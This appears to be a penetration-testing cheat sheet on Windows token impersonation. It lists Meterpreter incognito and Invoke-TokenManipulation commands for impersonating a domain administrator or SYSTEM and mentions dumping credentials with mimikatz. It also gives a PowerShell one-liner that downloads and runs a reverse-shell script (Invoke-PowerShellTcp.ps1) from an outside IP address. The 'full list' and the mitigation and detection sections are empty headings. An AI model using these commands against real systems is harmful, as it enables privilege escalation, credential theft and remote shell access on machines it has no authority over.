Token Impersonation

Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.

That are certain privileges in Windows that, if enabled, could lead to an attacker escalating privileges to SYSTEM or any other user account with an active and valid token on that system, through various tools that have been designed to specifically exploit this vulnerability.

Exploitable Privileges

Certain privileges can be exploited to either escalate privileges directly to SYSTEM or to perform actions that are normally restricted. The privileges listed below can grant direct admin access when exploited:

full list is here:

Using Metasploit

in your meterpreter shell load incognito module:

load incognito

list available tokens:

list_tokens -u

Impersonate Administrator:

impersonate_token megacorp\\administrator

Invoke-TokenManipulation

Invokes token impersonation as a domain user. If this doesn't work you can try impersonating SYSTEM and then dumping credentials using mimikatz.

Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"

Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe"

As a replacement for the last command you could do, but be vary of special characters in the command like " and '

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"

Other Techniques

Mitigation & Detection